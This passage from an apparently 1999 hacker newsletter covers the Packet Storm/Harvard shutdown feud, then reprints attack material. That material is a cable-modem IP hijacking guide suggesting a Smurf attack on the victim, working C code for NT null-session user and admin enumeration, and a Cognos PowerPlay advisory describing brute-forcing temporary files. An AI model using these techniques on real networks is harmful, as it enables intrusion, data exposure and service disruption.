and gave me the root password and told me I had free rein on the box. It doesn't matter that Harvard network security was never actually compromised. For the record, Jeff Gray, the Harvard senior sysadmin, has been extremely supportive of my site and work from the beginning, and he deserves ALOT of credit for going out of his way to help keep Packet Storm Security alive and online. In fact, Jeff Gray has provided so much support for "the security community" in general, and is so supportive of security-related research and projects, that he deserves all the credit in the world for his efforts. I hope Harvard gives him the credit he is due, because any network security they have is in large part due to his skills, devotion, and diligence. If that's not enough to annoy me, all of my class work for the class I'm taking at NCSU this summer (CSC499 Independent Research project involving IDS) is/was on that server at Harvard and gone now too. With 4 weeks left in the semester here at NCSU, I have just lost seven weeks of work and data that cannot be replaced in 4 weeks. What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good. The site was getting over 400,000 hits/day and doing about 10 GB/day in transfers, so I don't see it coming back online even if I do get any of the site content back. Obviously, I have taken full responsibility for the site content and all activities and events associated with that server. Even though no laws or rules were broken, on my part, and to my knowledge, I am now facing possible legal action from both JP and Harvard, and state/federal computer crime charges as well. What am I going to do now? I don't know. The web site I devoted most of my waking hours to is gone. My chances of passing my CSC499 class do not look good, according to the negative comments from my professor. I'll try to salvage the summer's worth of course work anyway if possible and pass. Until formal charges are filed, I've still got my job and account here at NCSU. When NCSU catches wind of this, and I'm sure they will, my account probably will be permanently revoked, and my job and the past three years of school will then be gone too. Until then, I can be contacted at the email address in the sig below. Check out the news and history of John Vranesevich and Carolyn Meinel's smear and harassment campaigns that have ruined the careers and lives of many people, mine included. www.attrition.org has all of the details. Funny how I spent the past few years donating my time, literally thousands and thousands of hours, to "the security community", never asking for or making a single penny off the time and work I invested, and have now lost it all because John Vranesevich and a few of his IRC friends are able to make quick phone calls, fabricate absurd stories about criminal activity, libel, threaten to sue Harvard, and I don't even get to plead my case. I am guilty without even being informed of what was going on. He has effectively ruined years of my work, my education, my career, my life. There are really only four things that I'd like right now: 1. Justice 2. Truth 3. The 3 GB of MY data that Harvard has and refuses to turn over to me 4. A job in the IT/IS/IW industries - the pay doesn't even matter, I'm willing to move, I'm willing to put in 60-80 hour weeks. Just give me a UNIX or Linux box to work from. I'll settle for just the job though, and like I said, the pay doesn't matter - I love computers, network security, and systems administration. If I was not doing it for pay, I'd be doing it for free. See you at BlackHat and DEFCON. take it easy, Ken Williams jkwilli2@unity.ncsu.edu if you need to reach me by phone, email me at jkwilli2@unity.ncsu.edu and CC the email to packetstorm@genocide2600.com with phone # request. my pgp keys are available on all of the regular keyservers, and at www4.ncsu.edu/~jkwilli2/ [Note: yes, you can quote or print any part of or the whole email.] Ken Williams ken@packetstorm.harvard.edu Packet Storm Security http://packetstorm.harvard.edu -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQEVAwUBN3sH3pDw1ZsNz1IXAQE67QgAt5O4cgV4UN/tNro0V9Hkrz4YJGuysf2F aZdUuM+P73MwwlvjKFpLW5WOJwtZzFjicv6RYMlXaMLRL48Fz/rltX95dy71LCOs /UVa9LXvh7kSgD5p/pSeP2+zyDuvbvUxjtSTIPRp68sOQTKILaQpohwl9hzpfVLz ADvQMD5vAUqGlTeoQrZRmHC/OxtWqVEgh72Gms4XpGaGwT3OdtoRKuK0d4Js3mP9 Vs1szlsT3DQEFvdblLR/jsf8jonbME/Imo89K69wFsbyeVpIB1+g0Se11BdQCbeU TdauQTJMfDTkIWSQvpQXXIhvukErb8D9bmFvKiE7MqS+N8RVaMO7Zw== =7OhX -----END PGP SIGNATURE----- *************************************************************************** -=- Net Thug Shuts Down Largest Free Security Site Wed Jun 30 16:36:10 MDT 1999 ATTRITION Staff Earlier today, the PacketStorm Security site was abruptly shut down with no warning. PacketStorm (packetstorm.harvard.edu) was one of the largest and most respected sites catering to security professionals worldwide. Boasting an average of 400,000 hits a day, pushing out roughly 10 gigs of traffic, the site was a valuable resource to an estimated 10,000 security professionals world wide. The security resource did not suffer at the hands of hackers or network intruders. Instead, a new kind of malicious criminal found success through a fear that haunts more and more Americans today. A single piece of email from John Vranesevich (founder of AntiOnline) to the educational institution hosting Packetstorm threatened a lawsuit if the site was not shut down. Harvard said there were "numerous" complaints, but provided no additional details. Like most US institutions, the idea of being dragged to court for any reason is enough to scare them into hasty action. With that mail, Harvard pulled the plug. This decision was no doubt made as an easy alternative to spending time and resources fighting the claims. Email from Ken Williams, primary administrator for the site, to Attrition staff indicated that not only did Harvard shut down the site, they denied him access to the machine and all information stored on it. The correspondance noted the likelihood that all information on the machine, and all backups would be destroyed in order to avoid the AntiOnline lawsuit. "All of the content and the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it." said PacketStorm founder Ken Williams. Williams went on to say that he does not fear any fraudulent lawsuit Vranesevich could attempt to level at him. The information contained on the site regarding Vranesevich was not in violation of any US law that he was aware of, and had been there for over a year. Along with the security site, months of William's own school work was lost. "I have just lost seven weeks of [class] work and data that cannot be replaced in 4 weeks." Williams said, referring to deadlines on the school work. "What bothers me the most is that all of the countless hours I put into that web site and the archives, thousands of hours, are gone now, for good." - Ken Williams, PacketStorm founder These vague and unfounded legal threats only serve to hurt the security community. AntiOnline's mission statement claims they exist "to educate the public on computer security related issues." Apparently, this mission statement forgot to include such things like "educate the public through OUR site only" and "as long as we profit from it". *************************************************************************** JP has since offered this news: http://www.antionline.com/archives/editorials/packetstorm.html ( Likely suffering major DoS attacks in result of their actions I was unable to get thru to the site to read their shit for posting here...they will burn in hell for this action - Ed ) Ok I cut thru the cruft, here's JP's 'story'; PacketStorm Is Shut Down An AntiOnline Editorial Thursday , July 01 1999 Apparently for some time now, PacketStorm Security, a popular underground collection of security related tools and information, has been maintaining a vast archive of materials about AntiOnline. These materials included entire stories, copies of the weekly mailbag, e-mails, and other materials copyrighted by AntiOnline LLP. On top of that, and what was far more serious, the site contained dozens and dozens of items which included: e-mails, messages, documents, images, and even public surveys. These materials were libelous, and in some cases, were blatant threats against members of my immediate family, myself, and my company. While I value the right to free speech as much, if not more, than the average American, I do not believe in individuals posting threatening and harassing documents about another individual, and their family members. It was for this reason, and no other, that I contacted Harvard University, which was hosting the PacketStorm Website, and requested that it be shut down. I did not threaten legal action, but simply directed University Administration to the website, for them to view, and to judge, on their own. Below is a copy of that letter: Greetings: May I first say that I did my best to see that this letter got sent to the appropriate individuals. I had some difficulty determining who those individuals may be, so if I have made an error, I would greatly appreciate it if you would forward this letter on to the appropriate individual(s). My name is John Vranesevich, and I am the Founder and General Partner of AntiOnline LLP, a computer security company based outside of Pittsburgh, PA. Earlier today, one of my colleagues forwarded me the following URL: http://packetstorm.harvard.edu/jp/ Needless to say, I was shocked and outraged at what I saw. This page contains a large archive of libelous and, to put it bluntly, sick material. Everything from archives of copyrighted material from our website, to altered pictures of my family, to 'stories' about me which contain images ranging from people engaged in homosexual activities, to a nun that appears to be covered in seminal fluid. I am astounded that an institution as prestigious Harvard would be party to the dissemination of this type of material. It is my hope that the University Administration was unaware of this site, and now that it has been brought to their attention, it is my hope that it will be dealt with promptly. I have worked to help several educational institutions develop 'Acceptable Use Policies', and if Harvard is similar to them, the above URL would be a clear violation of that policy. It is my hope that the above mentioned domain will be shut down immediately, and that the individual responsible will be seriously reprimanded. I hope to hear from you soon about this matter, and what you may have done regarding it. Yours In CyberSpace, John Vranesevich Founder, AntiOnline Tonight, Ken Williams, the founder of Packet Storm Security, released a letter to the public. The letter read in part: Funny how I spent the past few years donating my time, literally thousands of hours, to "the security community", never making even a penny off the time and work I invested, and have now lost it all because some asshole named John Vranesevich is able to make a quick phone call, fabricate absurd stories about criminal activity and bullshit I never did, and effectively ruin years of work, my education, my career, my life. Ken, I know what it's like to dedicate many, many, thankless hours into a project, believe me. But, you did not loose your site because of me, you lost it because of you. I could not stand by and watch your site be used as a platform to harass and threaten my family, myself, and the business which I have worked hard to start. While you, and others who 'follow you' may criticize me for what I did, I think everyone that's reading this, who has family members that they love, and a career that they enjoy, will admit to themselves that if in my shoes, they would have done at least the same. I hold absolutely no grudge towards you as a person, and I hope that you have the best of success in all that you do. Due to the types of threats that I have been receiving, and that sites like PacketStorm have been propagating, local law enforcement agencies were put on alert, and began doing extensive extra patrolling of the residence of my family members, my own residence, and the AntiOnline Offices. I realize that the actions that I have taken against PacketStorm may greatly increase the immediate threat against my family, myself, and my company; and that the harassment will now only get worse. However, I will not allow my family, myself, nor my company to become a victim. I am standing my ground, and will continue AntiOnline's mission of putting an end to malicious hackers. People in this country have the right to say and do whatever they please, unless that is, what they say and do infringes on the rights of another - anonymous. Yours In CyberSpace, John Vranesevich Founder, AntiOnline -=- *************************************************************************** Packetstorm mirror site announced at HNN: http://packetstorm.nl.linux.org/ " Support for Ken Williams Continues to Grow contributed by Space Rogue The outpouring of support for Ken Williams and Packet Storm Security has been phenomenal. One such item of support has been the beginning of an effort to rebuild PSS from scratch as a grassroots effort. The organizer of this is asking anyone who ever downloaded a file form PSS to upload it here. PacketStorm Mirror http://packetstorm.nl.linux.org/ *************************************************************************** Statement from Harvard: ======================= * S T A T E M E N T * As a service to the Internet community, Harvard agreed to host a Packet Storm Security Website for security-related materials only. Without Harvard's knowledge, unrelated content was put on the Harvard server, including sexually-related material and personal attacks on an individual not affiliated with the University. A Harvard administrative site focused on security issues is not the forum for this type of material. We are returning the content on the site and hope that Packet Storm will make its security tools available through its own Website. Joe Wrinn Director Office of News and Public Affairs Joe Wrinn Director, Harvard News Office 1350 Massachusetts Ave., Rm. 1060 Cambridge, MA 02138 *************************************************************************** Ken's Rebuttal to the Harvard statement; Date: 7/1/99 17:58 Received: 7/1/99 18:01 From: Ken Williams, jkwilli2@unity.ncsu.edu Hi, [The Harvard] statement is incorrect, and even libelous itself by implying that I had "sexually related materal" on the server. I NEVER did! NOW, I will retain legal counsel. This is outrageous! I wouldn't have been surprised to find myself slandered by John Vranesevich and AntiOnline, but to have Harvard implicitly state that I was serving up "sexually related material" to the Internet is absurd, libelous, and legally reprehensible. Are you, Harvard, trying to ruin my reputation and career now too? It sounds to me like you are fabricating this "sexually related material and personal attacks" statement to appease your critics, and, as I (now ominously) mentioned in my first open letter, trying to use me as the fall guy. Regretfully, Ken Williams *************************************************************************** ZDNet; ZDNN: Harvard caught in hacker crossfire Tue, 01 April 1996 18:29:02 GMT Harvard University is caught in the middle of an online war between hacking-scene follower AntiOnline.com and the hacking community at large. On Wednesday, the Cambridge, Mass., university removed an independent security Web site, known as Packet Storm, which it had been mirroring on its servers for only 10 days. The reason: A directory of material hidden in the Web site, and thus on Harvard's servers, that had "sexually related material and personal attacks on an individual not affiliated with the University," said Joe Wrinn, director of news and public affairs for Harvard, in a statement released by Harvard on Thursday. "We agreed to have a site that had security-related materials only," said Wrinn. "Both parties involved were using us in a way that was completely inappropriate." Ken Williams, a North Carolina State University employee and the Webmaster of Packet Storm, angrily refuted the allegations. "This statement is incorrect, and even libelous itself by implying that I had 'sexually related material' on the server," he wrote in an e-mail. "I never did!" According to Williams, the directory -- labeled "/jp" because it was a collection of material satirizing AntiOnline founder and chief John P. Vranesevich -- had a parody of the AntiOnline site. But others familiar with the site said that the parody also contained photos of nude women that were intended to be more sarcastic than sexual. Harvard obviously didn't get the joke. Harvard's Wrinn did not know specifically what sort of "sexual" content was contained on the site. Harvard in the hot seat "We are in the middle of this and it's inappropriate," said Harvard's Wrinn, sounding distinctly uncomfortable with the attention that the issue was attracting. Harvard intends to send the complete contents of the site back to Williams so that he can post it elsewhere. No wonder: Packet Storm wasn't just a small-time site -- it had been the place to go for both hackers and security experts to get up-to-date security information. "Packet Storm was a huge compilation of security tools," said Brian Martin, known as "Jericho," one of the Webmasters at hacker news and information site Attrition.org. "It was updated daily with tools. It was always there." Among organizations that used and mirrored the site: The Department of Defense and the Federal Bureau of Investigation, claimed Webmaster Williams. 'I didn't have an anti-J.P. Temple of Hate' Yet, Williams had also sided with many others in hacker circles who have been waging a war -- of mainly -- words against AntiOnline's Vranesevich and his latest ally, Caroline Meinel, security researcher and webmaster of The Happy Hacker. "I didn't have an anti-J.P. Temple of Hate or anything," said Williams. "But there are companies, organizations, and individuals out there that ;we believe; are black-eyes of the industry." So, Williams attached a non-public directory to the Web site that archived parodies and criticisms of AntiOnline's founder. The directory represented a single facet of a complex war of image in the hacker not-so-underground. For the most part, AntiOnline and its main foe, Attrition.org, have squared off with conflicting allegations of slander, libel and plagiarism. ' I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit.' "I can understand a parody -- I have no problem with that," said the 20-year-old Pennsylvania Webmaster, adding that he thought Williams acknowledged that the photos had been put up, but that since they had come from a source already online, the Packet Storm Webmaster thought the pictures were fair game. Vranesevich's answer? The Webmaster notified Harvard of the hidden directory in a letter to the university's provost -- and Harvard quickly took the site down. Did Harvard act too quickly? B.K. DeLong, a Boston-based computer security consultant, thought Harvard acted too quickly. "I am kind of disappointed that an institution like Harvard was so quick to pull the plug just to avoid a potential suit," he said. yet Harvard wasn't the only one to act quickly. By late Wednesday night, the Keebler Elves -- the cybergang that claimed responsibility for hacking into the National Oceanic and Atmospheric Administration last week -- defaced another government Web site with the news. "Now, because of; JP ... Packetstorm is no more, and never will be again," the site http://www.aao.uc.usbr.gov/ lamented. Unnamed hackers also struck at AntiOnline more directly. AntiOnline's site came under a denial-of-service attack -- which floods a particular site with random data -- so severe that its Internet service provider pulled the site for almost 12 hours on Thursday, said Vranesevich. Ugly threats Other attacks were even less friendly. "I have received more death threats in the last 24 hours by phone, than I have in five years," he said. Not quite an apology, Vranesevich added that he never intended the entire Packet Storm site to be taken down. "I know what it's like to have the university stomp its foot down on you. When I was a student at the University of Pittsburgh, I had my Web site shut down," he said. "But I never threatened anyone." In his mind, the contents of "/jp" did. @HWA 03.0 Cable Modem Hijacking from www.hackcanada.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Cable Modem IP Hijacking in Win95/98 The purpose of this is to show you how bad cable modems security is and that even with a win box you can take someone else's IP. You can hijack IP's using a cable modem and it's very simple in any operating system. Just follow the steps: 1) Choose someone's IP that you wish to have. Make sure the IP is on the same network. Most cable modem providers use DHCP. The fist thing you have to do is find the victims IP. Remember the victims IP has to be in the same network and with the same service provider for this to work. 2) Now this is probably the hardest thing in this file (but it's still easy), you have to wait until the victims computer is off or you can Smurf kill his connection. When you think his computer is off-line just try to ping it to see if you get a response. Do this by going to a DOS prompt and typing ping (victims IP). If you get a response then you have to try harder. After you get his PC off-line then you go into your network properties and edit the IP settings, but instead of having yours there you put the victims IP, host, and domain. 3) Restart. If you restart and you get an IP conflict this means that the victims computer is on, if you don't get an IP conflict then try to go to your web browser and see if it works. With some cable modem providers you might have to also add the Gateway, Subnet mask (255.255.55.0), Host, DNS search, and Domain. Now you can go. Everything will work until the victims PC is back on. Once it is back online it will take the IP away because it will tell you that you have the wrong Mac addresses. *Linux* This is also possible in Linux, but is not the best way. You can change your Mac address to the victims PC and this is more secure and much easier. There are a couple of scripts to change your address, just look around. Warning: Some cable modem service providers will know when you're using the wrong IP, but hey, it might be useful. Copyright (c) 1999 Wildman www.hackcanada.com @HWA 04.0 Exploiting Null Session Weaknesses in NT environment ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Details About NULL Sessions This page is a detailed explanation for programmatically connecting to NT Server NULL Sessions and extracting the name of the true administrator account. Even non-programmer Admins should read through this and become familiar with the API's explained in order to better understand the NT environment and recognize code that might be used against them. The original purpose of NULL sessions is to allow unauthenticated hosts to obtain browse lists from NT servers and participate in MS networking. Mostly this is useful for Win95/98/NT hosts who are not domain members, but still need to obtain browsing information. The problem occurs in cases where a NULL session becomes included in the everyone group and now has access to resources to which they weren't authenticated, but that the authenticated group had permissions for. Originally, 'everyone' did not mean 'anyone'. You still had to log on to be in the everyone group. however, NULL Sessions are the one case where 'everyone' could mean 'anyone'. This is the reason MS created the *NEW* Authenticated group. The Authenticated group does not include NULL Sessions and so can never mean 'anyone' - until someone finds an exploit. The following code segments are commented to show exactly what is happening, what API's are being used, and how the true administrator name can be identified. First - making a NULL Session connection One way to this is by using the Net Use command with an empty password. Programmatically, it looks like this.... //This function called from dialog that fills listbox with connections BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg) { //Setup for UNICODE char* pTemp = TargetHost.GetBuffer(256); WCHAR wszServ[256]; LPWSTR Server = NULL; //Convert to Unicode MultiByteToWideChar(CP_ACP, 0, pTemp, strlen(pTemp)+1, wszServ, sizeof(wszServ)/sizeof(wszServ[0]) ); //Create the IPC$ share connection string we need Server = wszServ; LPCWSTR szIpc = L"\\IPC$"; WCHAR RemoteResource[UNCLEN + 5 + 1]; // UNC len + \IPC$ + NULL DWORD dwServNameLen; DWORD dwRC; //Setup Win32 structures and variables we need NET_API_STATUS nas; USE_INFO_2 ui2; SHARE_INFO_1* pSHInfo1 = NULL; DWORD dwEntriesRead; DWORD dwTotalEntries; //Set up handles to tree control to insert connection results HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot; char sharename[256]; char remark[256]; if(Server == NULL || *Server == L'\0') { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } dwServNameLen = lstrlenW( Server ); //Test for various errors in connection string and recover if(Server[0] != L'\\' && Server[1] != L'\\') { // prepend slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return FALSE; } if(lstrcatW(RemoteResource, Server) == NULL) return FALSE; if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE; //Start with clean memory ZeroMemory(&ui2, sizeof(ui2)); //Fill in the Win32 network structure we need to use connect API ui2.ui2_local = NULL; ui2.ui2_remote = (LPTSTR) RemoteResource; ui2.ui2_asg_type = USE_IPC; ui2.ui2_password = (LPTSTR) L""; //SET PASSWORD TO NULL ui2.ui2_username = (LPTSTR) L""; ui2.ui2_domainname = (LPTSTR) L""; //MAKE THE NULL SESSION CALL nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0, TVI_ROOT); } //THIS IS WHERE NT HANDS OUT IT INFORMATION nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1, MAX_PREFERRED_LENGTH, &dwEntriesRead, &dwTotalEntries, NULL); dwRC = GetLastError(); if( nas == NERR_Success ) { if(dwTotalEntries > 0) { shareRoot = pDlg->m_Victims.InsertItem("Shares", machineRoot,TVI_LAST); userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST); adminRoot = pDlg->m_Victims.InsertItem("Admin", machineRoot,TVI_LAST); } for(int x=0; x<(int)dwTotalEntries; x++) { // Convert back to ANSI WideCharToMultiByte(CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_netname, -1, sharename, 256, NULL, NULL ); WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1, remark, 256, NULL, NULL ); CString ShareDetails = sharename; ShareDetails = ShareDetails + " - " + remark; //fill the tree with connect info attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST); pSHInfo1++; } } //My Wrapper function for listing users - see below DoNetUserEnum(Server, pDlg, userRoot, adminRoot); //WE ARE DONE, SO KILL THE CONNECTION nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0); TargetHost.ReleaseBuffer(); SetLastError( nas ); return FALSE; } The following function is how one can programmatically determine the administrator status of an account...... bool GetAdmin(char* pServer, char* pUser, CString& Name) { BOOL fAdmin = FALSE; DWORD dwDomainName,dwSize,dwAdminVal; SID_NAME_USE use; PSID pUserSID = NULL; // SID for user int rc; int iSubCount; bool bFoundHim = 0; dwDomainName = 256; dwSize = 0; dwAdminVal = 0; iSubCount = 0; //Call API for buffer size since we don't know size beforehand rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); rc = GetLastError(); //Allocate a larger buffer if(rc == ERROR_INSUFFICIENT_BUFFER) { pUserSID = (PSID) malloc(dwSize); //Repeat call now that we have the right size buffer rc = LookupAccountName(pServer, pUser, pUserSID, &dwSize, szDomainName, &dwDomainName, &use ); } //Scan the SIDS for the golden key - ADMIN == 500 //Get a count of SID's iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID)); //Admin SID is the last element in the count dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1)); if(dwAdminVal==500) //TEST TO SEE IF THIS IS THE ADMIN { Name.Format("Admin is %s\\%s\n", szDomainName, pUser); bFoundHim = true; } delete pUserSID; return bFoundHim; //WE KNOW WHO HE IS, ADD HIM TO THE TREE } Wrapper for Listing the user accounts..... void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot) { USER_INFO_10 *pUserbuf, *pCurUser; DWORD dwRead, dwRemaining, dwResume, dwRC; char userName[256]; char userServer[256]; dwResume = 0; if(pServer[0] != L'\\' && pServer[1] != L'\\') { //Start sting with correct UNC slashes and NULL terminate RemoteResource[0] = L'\\'; RemoteResource[1] = L'\\'; RemoteResource[2] = L'\0'; } else { dwServNameLen -= 2; // drop slashes from count RemoteResource[0] = L'\0'; } if(dwServNameLen > CNLEN) { SetLastError(ERROR_INVALID_COMPUTERNAME); return; } if(lstrcatW(RemoteResource, pServer) == NULL) return; do { pUserbuf = NULL; //THIS IS THE API THE NT USES TO HAND OUT IT's LIST dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf, 1024, &dwRead, &dwRemaining, &dwResume); if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS) break; DWORD i; for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser) { // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1, userName, 256, NULL, NULL ); // Convert back to ANSI. WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL ); if(!GotAdmin) { //use char strings CString Admin; GotAdmin = GetAdmin(userServer, userName, Admin); if(GotAdmin) { Admin.TrimRight(); HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST); pDlg->m_Victims.EnsureVisible(adminChild); } } CString strUserName = userName; pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST); } if (pUserbuf != NULL) NetApiBufferFree(pUserbuf); } while (dwRC == ERROR_MORE_DATA); if (dwRC != ERROR_SUCCESS) printf("NUE() returned %lu\n", dwRC); } Send mail to info@ntobjectives.com with questions or comments about this document. Copyright � 1999 NT OBJECTives, Inc. All Rights Reserved. All trademarks are the property of their respective owners. Last modified: June 28, 1999 @HWA 05.0 Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/ Date: Mon, 28 Jun 1999 07:29:37 -0400 From: Darin White To: BUGTRAQ@netspace.org Subject: Cognos PowerPlay Web Edition security WEB SECURITY ADVISORY ------------- Release Date: 1999-06-25 Application: Cognos PowerPlay Web Edition Severity: Unauthenticated web users can sniff cube data Author: Darin White Operating Sys: Microsoft NT Server -------------- I. Description Due to design problems as well as some potential web server misconfiguration PowerPlay Web Edition may serve up data cubes in a non-secure manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. Those files are then fed back to frames in the browser. In some cases it is trivial for an unauthenticated user to tap into those data files before they are purged. Cognos has been contacted but does not regard this as a serious exposure (see appendix B below). The issues are: (a) dynamic directory listing (b) weak temporary filename algorithm (c) ad hoc parameters to the CGI II. Details Identifying PowerPlay sites is quickly accomplished using AltaVista http://www.altavista.com/cgi-bin/query? pg=q&kl=XX&q=%2Blink%3Appdscgi.exe&search=Search (join last two lines) which hits all pages containing a link to the PowerPlay CGI ppdscgi.exe on NT. Normal authentication for protected cubes occurs when a user selects a link like: Example At this point the user is prompted for a userid and password. Beyond this check there seems to be no verification that data is being fed out to the browser that requested it and was authorized. (a) dynamic directory listing Netscape Enterprise Server 3.5.1 appears to be serving up dynamic directory listings by default. A known PowerPlay site can be hit with a request for http://www.example.com/ppwb/Temp/ which will return something like: /ppwb/Temp/ - 6/25/99 9:17 AM 17904 1ad6t.htm 6/25/99 9:17 AM 37828 1ad6x.htm Here we see two temporary files created by one initial cube request. The suffix 't' in the first filename denotes the PowerPlay toolbar and 'x' denotes the data content. These files are fed back to the browser to populate two frames. Clicking on the content filename will allow any user to browse the current cube view with no authentication challenge even if the cube has been password-protected. Once into the cube the user may continue to drill for further data. (b) weak temporary filename algorithm Sites that have disabled directory listing may still be vulnerable. Many sites using PowerPlay offer a mix of protected and unprotected cubes. Some sites also offer an anonymous user account (let's say "guest" for example). The PowerPlay CGI uses a common temporary directory for serving all cubes back to the browser. Using the guest account or viewing an unprotected cube a user may right-click the content area and select View Frame Info which will display the temporary filename. By repeatedly reloading the initial cube view and viewing frame info a list of temporary filenames may be generated in order to analyze the filename algorithm. e.g. http://www.example.com/ppwb/Temp/1eeex.htm http://www.example.com/ppwb/Temp/1f77x.htm http://www.example.com/ppwb/Temp/1fcfx.htm http://www.example.com/ppwb/Temp/1ff6x.htm http://www.example.com/ppwb/Temp/2014x.htm Analysis of the filename progression shows: * the last char is 'x' for the data and 't' for the toolbar * first n-1 chars are hexadecimal chars only * the hexadecimal "numbers" comprising the filename are ascending only * the first char is never 0. e.g. fffx.htm => 1000x.htm * simple hexadecimal subtraction on the first n-1 chars of consecutive filenames shows a very predictable pattern (see appendix A) A user may orient themselves in the namespace (the set of all possible filenames) by using a guest account or unprotected cube. Once oriented a set of candidate filenames may be generated and requested from /ppwb/Temp on the server. Of course this approach assumes valid users are hitting the cubes at the same time. Once a successful hit has been made on a temporary file the user may drill further into the data as described in (a) above. Alternatively a brute force attack on a server could be attempted by just submitting requests for all possible filenames. Of course if you could establish some idea of how long the site has been operational you might start with 4-char filenames. A very new site with low traffic (if the owner displays a page counter) might be best approached with 3-char names. This type of attack would present a beat-the-clock situation as the ~65000 requests (for 4-char) scanned for an existing file before it was purged from the Temp directory. (c) ad hoc parameters to the CGI A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe provide additional information on the PowerPlay server. * ?ABOUT= will return the version of PowerPlay. * ?TOC (or no parameter) presents a table of contents list of all web-enabled cubes on the server. Some sites are using static page links to hit cubes rather than relying on PowerPlay's generated TOC. They may not be aware that all cubes are available. * the hidden parm PPWB in the data contents frame details the unaliased location of the temporary directory. e.g. INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb"> III. Solution (a) dynamic directory listing Turn this feature off on you web server following the directions provided by the server vendor. If you are unable to disable this feature you may create an index.html file in the /ppwb/Temp directory that will load when a filename has not been specified in the URL. (b) weak temporary filename algorithm This is really on Cognos' plate. Watch your error logfile for a lot of failed requests for /ppwb/Temp/*.htm to at least detect an attack. Removing anonymous cube access may slow an attack. (c) ad hoc parameters to the CGI Just be aware of what is available by altering the parameters. Don't assume your cubes are hidden because there is no direct link to the table of contents from the web. Password protect your cubes. DW APPENDIX A Here's the output of one subtraction run which shows the v6.5 temporary filenames and then the hex delta between adjacent filenames: Processing test.dat ... 2161x.htm 216bx.htm Ax 2188x.htm 1Dx 2192x.htm Ax 219cx.htm Ax 21a6x.htm Ax 21afx.htm 9x 21b9x.htm Ax 21c3x.htm Ax 21cdx.htm Ax 21d7x.htm Ax 21e0x.htm 9x 21eax.htm Ax 21f4x.htm Ax 21fex.htm Ax 2207x.htm 9x 2211x.htm Ax 221bx.htm Ax 2225x.htm Ax 222fx.htm Ax 2238x.htm 9x 2242x.htm Ax 224cx.htm Ax 2256x.htm Ax 2260x.htm Ax 2269x.htm 9x 2273x.htm Ax 227dx.htm Ax 2287x.htm Ax 2291x.htm Ax 229ax.htm 9x SUMMARY diff count A : 23 1D : 1 9 : 6 out of 31 filenames Here are some other summaries: SUMMARY diff count 203B : 1 DF : 1 13 : 4 A : 10 14 : 3 27 : 1 9 : 1 out of 22 filenames SUMMARY diff count 3E : 1 A : 19 9 : 5 out of 26 filenames Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed: 25bx.htm 25cx.htm 1x 25dx.htm 1x 25ex.htm 1x 25fx.htm 1x 260x.htm 1x 261x.htm 1x 262x.htm 1x 263x.htm 1x 264x.htm 1x 265x.htm 1x 266x.htm 1x 267x.htm 1x 268x.htm 1x 269x.htm 1x 26ax.htm 1x 26bx.htm 1x 26cx.htm 1x SUMMARY diff count 1 : 17 out of 18 filenames SUMMARY diff count 37E : 1 1 : 491 out of 493 filenames SUMMARY diff count 1E7 : 1 1 : 295 out of 297 filenames SUMMARY diff count 1 : 1255 out of 1256 filenames APPENDIX B 1999-06-10 analysis submitted to Cognos 1999-06-11 submission acknowledged 1999-06-18 response from Cognos (below) ----------------------------- Hello Darin, Thank you for the descriptive analysis of your problem. I understand that you have set up anonymous access and therefore you are aware of the security risk. I agree that the temp file generation is predictable and would suggest logging an enhancement through our web site. In the interim you have to weigh what is acceptable in terms of security knowing that there are other alternatives such as SSL and LDAP. These other options will of course offer substantially more protection. In conclusion your analysis is correct, now it is a factor of weighing your security wants and needs. Regards, Michael Bockholt Cognos Support Specialist Tel: 1-800-637-7447 email: support@cognos.com ----------------------------- 